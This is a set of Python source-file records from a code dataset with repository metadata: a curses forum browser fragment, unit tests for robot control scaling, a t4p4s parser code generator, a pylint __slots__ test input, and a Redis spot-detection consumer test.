elif j > 0:
cont['browse_now_line'] += j
pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def page_up():
"""
使pad_b向上翻页,一次10行
TODO: 后期尝试将page_down和page_up合并
"""
global cont
i = cont['browse_now_line']
if i >= 10:
cont['browse_now_line'] -= 10
elif 0 < i < 10:
cont['browse_now_line'] -= i
pad_b.refresh(cont['browse_now_line'], 0, 0, 0, curses.LINES - 3, curses.COLS - 1)
def next_page():
"""
访问版块的下一页
"""
global cont
if cont['location'][0] == "forum":
cont['now_page'] += 1
forum(cont['location'][1], cont['now_page'])
elif cont['location'][0] == "thread":
# 判断访问的页数是否大于串页数,从串回复数量计算
x = int(post_list['rC'])
n = (int(x / 18) if (x % 18 == 0) else int(x / 18) + 1)
if cont['now_page'] < n:
cont['now_page'] += 1
thread(cont['location'][2], cont['now_page'])
def previous_page():
"""
访问版块或串的上一页
"""
global cont
if cont['location'][0] == "forum" and cont['now_page'] > 0:
cont['now_page'] -= 1
forum(cont['location'][1], cont['now_page'])
elif cont['location'][0] == "thread" and cont['now_page'] > 0:
cont['now_page'] -= 1
thread(cont['location'][2], cont['now_page'])
def back():
bl = cont['back_list']
if len(bl) > 1:
if bl[-2][0] is not None:
# pad_info_print(str(bl[-1][2]))
if bl[-2][0] == "forum":
# pad_info_print("a")
forum(bl[-2][1])
cont['back_list'].pop()
elif bl[-2][0] == "thread":
# pad_info_print("b")
thread(bl[-2][2])
cont['back_list'].pop()
elif bl[-2][0] == "forum_list":
print_forum_list()
| 573 | 0 | 46 |
51f226bec2148468c07bafa983dd37d9c64a9486 | 4,752 | py | Python | server/volumes/brain_src/test/test_control_handling.py | paul-felt/geppetto | 05596c37f63c1e89132cf3e07f9e8d7966766916 | [
"MIT"
] | null | null | null | server/volumes/brain_src/test/test_control_handling.py | paul-felt/geppetto | 05596c37f63c1e89132cf3e07f9e8d7966766916 | [
"MIT"
] | null | null | null | server/volumes/brain_src/test/test_control_handling.py | paul-felt/geppetto | 05596c37f63c1e89132cf3e07f9e8d7966766916 | [
"MIT"
] | null | null | null | import unittest
import numpy as np
import base64
from brain import control_handling
from brain import constants
claw_control_info = {
constants.SIGNAL_NAME: 'claw',
constants.SIGNAL_LIMITS: [100.0, 400.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.claw',
}
twist_control_info = {
constants.SIGNAL_NAME: 'twist',
constants.SIGNAL_LIMITS: [100.0, 500.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.twist',
}
if __name__ == '__main__':
unittest.main()
| 39.932773 | 112 | 0.611742 | import unittest
import numpy as np
import base64
from brain import control_handling
from brain import constants
claw_control_info = {
constants.SIGNAL_NAME: 'claw',
constants.SIGNAL_LIMITS: [100.0, 400.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.claw',
}
twist_control_info = {
constants.SIGNAL_NAME: 'twist',
constants.SIGNAL_LIMITS: [100.0, 500.0],
constants.SIGNAL_CHANNEL_NAME: 'gp.robots.testrobot.controls.twist',
}
class TestControlHandling(unittest.TestCase):
# example assertions
#self.assertEqual('foo'.upper(), 'FOO')
#self.assertTrue('FOO'.isupper())
#self.assertFalse('Foo'.isupper())
#with self.assertRaises(TypeError):
# s.split(2)
def test_format_control_output(self):
data = [
{
constants.SIGNAL_NAME: "bogus",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 100,
constants.SIGNAL_TS: 1,
},
{
constants.SIGNAL_NAME: "claw",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 100,
constants.SIGNAL_TS: 2,
},
{
constants.SIGNAL_NAME: "twist",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 500,
constants.SIGNAL_TS: 3,
},
{
constants.SIGNAL_NAME: "claw",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_CONTROL,
constants.SIGNAL_VALUE: 250,
constants.SIGNAL_TS: 4,
},
]
batch = control_handling.format_data(data, control_infos = [claw_control_info, twist_control_info])
#print('aaa',batch.keys())
self.assertEqual(batch.keys(), set(['claw', 'claw_mask', 'twist', 'twist_mask']))
#print('bbb claw_mask',batch['claw_mask'])
self.assertTrue( np.all( batch['claw_mask'] == [0,1,0,1] ) )
#print('ccc claw',batch['claw'])
self.assertTrue( np.all( batch['claw'] == [0.5, 0.0, 0.0, 0.5] ) )
#print('ddd twist_mask',batch['twist_mask'])
self.assertTrue( np.all( batch['twist_mask'] == [0,0,1,0]) )
#print('eee twist',batch['twist'])
self.assertTrue( np.all( batch['twist'] == [0.5, 0.5, 1.0, 1.0] ) )
def test_format_control_output_empty(self):
' make sure an empty batch (just sensors) gives us default values for all controls '
data = [
{
constants.SIGNAL_NAME: "bogus",
constants.SIGNAL_TYPE: constants.SIGNAL_TYPE_SENSOR,
constants.SIGNAL_VALUE: 100,
constants.SIGNAL_TS: 1,
},
]
batch = control_handling.format_data(data, control_infos = [claw_control_info, twist_control_info])
self.assertEqual(batch.keys(), set(['claw', 'claw_mask', 'twist', 'twist_mask']))
#print('bbb claw_mask',batch['claw_mask'])
self.assertTrue( np.all( batch['claw_mask'] == [0] ) )
#print('ccc claw',batch['claw'])
self.assertTrue( np.all( batch['claw'] == [0.5] ) )
def test_scale_between_0_and_1(self):
self.assertEqual( 0.0, control_handling.scale_between_0_and_1(100, claw_control_info) )
self.assertEqual( 0.5, control_handling.scale_between_0_and_1(250, claw_control_info) )
self.assertEqual( 1.0, control_handling.scale_between_0_and_1(400, claw_control_info) )
def test_to_control_limits(self):
self.assertEqual( 100, control_handling.scale_to_control_limits(0.0, claw_control_info) )
self.assertEqual( 250, control_handling.scale_to_control_limits(0.5, claw_control_info) )
self.assertEqual( 400, control_handling.scale_to_control_limits(1.0, claw_control_info) )
def test_shift_forward(self):
batch = {
'a': np.array([2,4,6,8], dtype='float32'),
'b': np.array([1,3,5,7], dtype='float32'),
}
shifted_batch = control_handling.shift_forward(batch, prefix='prev_', default=0.5)
#print('shifted batch==%s'%shifted_batch)
self.assertTrue(np.all( shifted_batch['prev_a'] == [0.5, 2, 4, 6] ) )
self.assertTrue(np.all( shifted_batch['prev_b'] == [0.5, 1, 3, 5] ) )
shifted_batch = control_handling.shift_forward(batch, prefix='prev_', prev_batch={'a':[0.4], 'b':[0.3]})
#print('shifted batch==%s'%shifted_batch)
self.assertTrue(np.all( shifted_batch['prev_a'] == [0.4, 2, 4, 6] ) )
self.assertTrue(np.all( shifted_batch['prev_b'] == [0.3, 1, 3, 5] ) )
if __name__ == '__main__':
unittest.main()
| 3,055 | 1,155 | 23 |
1b9f3e6d5112c9b28a120b41422bd49f725e07ba | 2,847 | py | Python | src/hardware_indep/multi/parser.stage.c.py | GEANT-DataPlaneProgramming/t4p4s | 334dec8e941ed7526d320fc1697ad7a30c3709fb | [
"Apache-2.0"
] | 4 | 2021-12-10T19:06:51.000Z | 2022-01-06T19:52:46.000Z | src/hardware_indep/multi/parser.stage.c.py | GEANT-DataPlaneProgramming/t4p4s | 334dec8e941ed7526d320fc1697ad7a30c3709fb | [
"Apache-2.0"
] | null | null | null | src/hardware_indep/multi/parser.stage.c.py | GEANT-DataPlaneProgramming/t4p4s | 334dec8e941ed7526d320fc1697ad7a30c3709fb | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
# Copyright 2021 Eotvos Lorand University, Budapest, Hungary
compiler_common.current_compilation['is_multicompiled'] = True
part_count = compiler_common.current_compilation['multi']
multi_idx = compiler_common.current_compilation['multi_idx']
table_names = (table.short_name + ("/keyless" if table.key_length_bits == 0 else "") + ("/hidden" if table.is_hidden else "") for table in hlir.tables)
all_table_infos = sorted(zip(hlir.tables, table_names), key=lambda k: len(k[0].actions))
table_infos = list(ti for idx, ti in enumerate(all_table_infos) if idx % part_count == multi_idx)
all_hdrs = sorted(hlir.header_instances.filterfalse(lambda hdr: hdr.urtype.is_metadata), key=lambda hdr: len(hdr.urtype.fields))
hdrs = list(hdr for idx, hdr in enumerate(all_hdrs) if idx % part_count == multi_idx)
if hdrs == []:
compiler_common.current_compilation['skip_output'] = True
else:
for hdr in hdrs:
#[ #include "parser_stages.h"
#{ int parser_extract_${hdr.name}(uint32_t vwlen, STDPARAMS) {
#[ uint32_t value32; (void)value32;
#[ uint32_t res32; (void)res32;
#[ parser_state_t* local_vars = pstate;
hdrtype = hdr.urtype
is_vw = hdrtype.is_vw
#[ uint32_t hdrlen = (${hdr.urtype.size} + vwlen) / 8;
#{ if (unlikely(pd->parsed_length + hdrlen > pd->wrapper->pkt_len)) {
#[ cannot_parse_hdr("${"variable width " if is_vw else ""}", "${hdr.name}", hdrlen, STDPARAMS_IN);
#[ return -1; // parsed after end of packet
#} }
if 'stack' in hdr and hdr.stack is not None:
#[ stk_next(STK(${hdr.stack.name}), pd);
#[ header_instance_t hdrinst = stk_current(STK(${hdr.stack.name}), pd);
else:
#[ header_instance_t hdrinst = HDR(${hdr.name});
#[ header_descriptor_t* hdr = &(pd->headers[hdrinst]);
#[ hdr->pointer = pd->extract_ptr;
#[ hdr->was_enabled_at_initial_parse = true;
#[ hdr->length = hdrlen;
#[ hdr->var_width_field_bitwidth = vwlen;
for fld in hdrtype.fields:
if fld.preparsed and fld.size <= 32:
#[ EXTRACT_INT32_AUTO_PACKET(pd, hdr, FLD(hdr,${fld.name}), value32)
#[ pd->fields.FLD(hdr,${fld.name}) = value32;
#[ pd->fields.ATTRFLD(hdr,${fld.name}) = NOT_MODIFIED;
#[ dbg_bytes(hdr->pointer, hdr->length,
#[ " :: Parsed ${"variable width " if is_vw else ""}header" T4LIT(#%d) " " T4LIT(%s,header) "/$${}{%dB}: ", hdr_infos[hdrinst].idx, hdr_infos[hdrinst].name, hdr->length);
#[ pd->parsed_length += hdrlen;
#[ pd->extract_ptr += hdrlen;
#[ return hdrlen;
#} }
#[
| 44.484375 | 194 | 0.600281 | # SPDX-License-Identifier: Apache-2.0
# Copyright 2021 Eotvos Lorand University, Budapest, Hungary
compiler_common.current_compilation['is_multicompiled'] = True
part_count = compiler_common.current_compilation['multi']
multi_idx = compiler_common.current_compilation['multi_idx']
table_names = (table.short_name + ("/keyless" if table.key_length_bits == 0 else "") + ("/hidden" if table.is_hidden else "") for table in hlir.tables)
all_table_infos = sorted(zip(hlir.tables, table_names), key=lambda k: len(k[0].actions))
table_infos = list(ti for idx, ti in enumerate(all_table_infos) if idx % part_count == multi_idx)
all_hdrs = sorted(hlir.header_instances.filterfalse(lambda hdr: hdr.urtype.is_metadata), key=lambda hdr: len(hdr.urtype.fields))
hdrs = list(hdr for idx, hdr in enumerate(all_hdrs) if idx % part_count == multi_idx)
if hdrs == []:
compiler_common.current_compilation['skip_output'] = True
else:
for hdr in hdrs:
#[ #include "parser_stages.h"
#{ int parser_extract_${hdr.name}(uint32_t vwlen, STDPARAMS) {
#[ uint32_t value32; (void)value32;
#[ uint32_t res32; (void)res32;
#[ parser_state_t* local_vars = pstate;
hdrtype = hdr.urtype
is_vw = hdrtype.is_vw
#[ uint32_t hdrlen = (${hdr.urtype.size} + vwlen) / 8;
#{ if (unlikely(pd->parsed_length + hdrlen > pd->wrapper->pkt_len)) {
#[ cannot_parse_hdr("${"variable width " if is_vw else ""}", "${hdr.name}", hdrlen, STDPARAMS_IN);
#[ return -1; // parsed after end of packet
#} }
if 'stack' in hdr and hdr.stack is not None:
#[ stk_next(STK(${hdr.stack.name}), pd);
#[ header_instance_t hdrinst = stk_current(STK(${hdr.stack.name}), pd);
else:
#[ header_instance_t hdrinst = HDR(${hdr.name});
#[ header_descriptor_t* hdr = &(pd->headers[hdrinst]);
#[ hdr->pointer = pd->extract_ptr;
#[ hdr->was_enabled_at_initial_parse = true;
#[ hdr->length = hdrlen;
#[ hdr->var_width_field_bitwidth = vwlen;
for fld in hdrtype.fields:
if fld.preparsed and fld.size <= 32:
#[ EXTRACT_INT32_AUTO_PACKET(pd, hdr, FLD(hdr,${fld.name}), value32)
#[ pd->fields.FLD(hdr,${fld.name}) = value32;
#[ pd->fields.ATTRFLD(hdr,${fld.name}) = NOT_MODIFIED;
#[ dbg_bytes(hdr->pointer, hdr->length,
#[ " :: Parsed ${"variable width " if is_vw else ""}header" T4LIT(#%d) " " T4LIT(%s,header) "/$${}{%dB}: ", hdr_infos[hdrinst].idx, hdr_infos[hdrinst].name, hdr->length);
#[ pd->parsed_length += hdrlen;
#[ pd->extract_ptr += hdrlen;
#[ return hdrlen;
#} }
#[
| 0 | 0 | 0 |
f01c40eda22ce2dbb9c545cd950b4f467984b666 | 285 | py | Python | venv/lib/python2.7/site-packages/pylint/test/input/func_newstyle___slots__.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | venv/lib/python2.7/site-packages/pylint/test/input/func_newstyle___slots__.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | 7 | 2021-02-08T20:22:15.000Z | 2022-03-11T23:19:41.000Z | venv/lib/python2.7/site-packages/pylint/test/input/func_newstyle___slots__.py | mutaihillary/mycalculator | 55685dd7c968861f18ae0701129f5af2bc682d67 | [
"MIT"
] | null | null | null | # pylint: disable=R0903
"""test __slots__ on old style class"""
__revision__ = 1
class OkOk(object):
"""correct usage"""
__slots__ = ('a', 'b')
class HaNonNonNon:
"""bad usage"""
__slots__ = ('a', 'b')
__slots__ = 'hop' # pfff
| 15.833333 | 39 | 0.585965 | # pylint: disable=R0903
"""test __slots__ on old style class"""
__revision__ = 1
class OkOk(object):
"""correct usage"""
__slots__ = ('a', 'b')
class HaNonNonNon:
"""bad usage"""
__slots__ = ('a', 'b')
def __init__(self):
pass
__slots__ = 'hop' # pfff
| 11 | 0 | 27 |
4ae2d6e7ad5b3277cfeece0959766a37d3ee5322 | 3,576 | py | Python | redis_consumer/consumers/spot_consumer_test.py | vanvalenlab/tf-serving-redis-interface | f696c05ee622ac6cc38dc1afcef2379d2ea9d9f0 | [
"Apache-2.0"
] | null | null | null | redis_consumer/consumers/spot_consumer_test.py | vanvalenlab/tf-serving-redis-interface | f696c05ee622ac6cc38dc1afcef2379d2ea9d9f0 | [
"Apache-2.0"
] | null | null | null | redis_consumer/consumers/spot_consumer_test.py | vanvalenlab/tf-serving-redis-interface | f696c05ee622ac6cc38dc1afcef2379d2ea9d9f0 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016-2022 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/kiosk-redis-consumer/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for SpotDetectionConsumer"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from redis_consumer import consumers
from redis_consumer.testing_utils import Bunch
from redis_consumer.testing_utils import DummyStorage
from redis_consumer.testing_utils import redis_client
# pylint: disable=R0201,W0621
| 38.869565 | 86 | 0.675615 | # Copyright 2016-2022 The Van Valen Lab at the California Institute of
# Technology (Caltech), with support from the Paul Allen Family Foundation,
# Google, & National Institutes of Health (NIH) under Grant U24CA224309-01.
# All rights reserved.
#
# Licensed under a modified Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.github.com/vanvalenlab/kiosk-redis-consumer/LICENSE
#
# The Work provided may be used for non-commercial academic purposes only.
# For any other use of the Work, including commercial use, please contact:
# vanvalenlab@gmail.com
#
# Neither the name of Caltech nor the names of its contributors may be used
# to endorse or promote products derived from this software without specific
# prior written permission.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for SpotDetectionConsumer"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from redis_consumer import consumers
from redis_consumer.testing_utils import Bunch
from redis_consumer.testing_utils import DummyStorage
from redis_consumer.testing_utils import redis_client
class TestSpotConsumer(object):
# pylint: disable=R0201,W0621
def test__consume_finished_status(self, redis_client):
queue = 'q'
storage = DummyStorage()
consumer = consumers.SpotConsumer(redis_client, storage, queue)
empty_data = {'input_file_name': 'file.tiff'}
test_hash = 0
# test finished statuses are returned
for status in (consumer.failed_status, consumer.final_status):
test_hash += 1
data = empty_data.copy()
data['status'] = status
redis_client.hmset(test_hash, data)
result = consumer._consume(test_hash)
assert result == status
result = redis_client.hget(test_hash, 'status')
assert result == status
test_hash += 1
def test__consume(self, mocker, redis_client):
# pylint: disable=W0613
queue = 'spot'
storage = DummyStorage()
consumer = consumers.SpotConsumer(redis_client, storage, queue)
empty_data = {'input_file_name': 'file.tiff'}
output_shape = (1, 32, 2)
mock_app = Bunch(
predict=lambda *x, **y: np.random.randint(1, 5, size=output_shape),
model=Bunch(
get_batch_size=lambda *x: 1,
input_shape=(1, 32, 32, 1)
)
)
mocker.patch.object(consumer, 'get_grpc_app', lambda *x, **_: mock_app)
mocker.patch.object(consumer, 'get_image_scale', lambda *x, **_: 1)
mocker.patch.object(consumer, 'validate_model_input', lambda *x, **_: x[0])
mocker.patch.object(consumer, 'detect_dimension_order', lambda *x, **_: 'YXC')
test_hash = 'some hash'
redis_client.hmset(test_hash, empty_data)
result = consumer._consume(test_hash)
assert result == consumer.final_status
result = redis_client.hget(test_hash, 'status')
assert result == consumer.final_status
| 1,837 | 10 | 77 |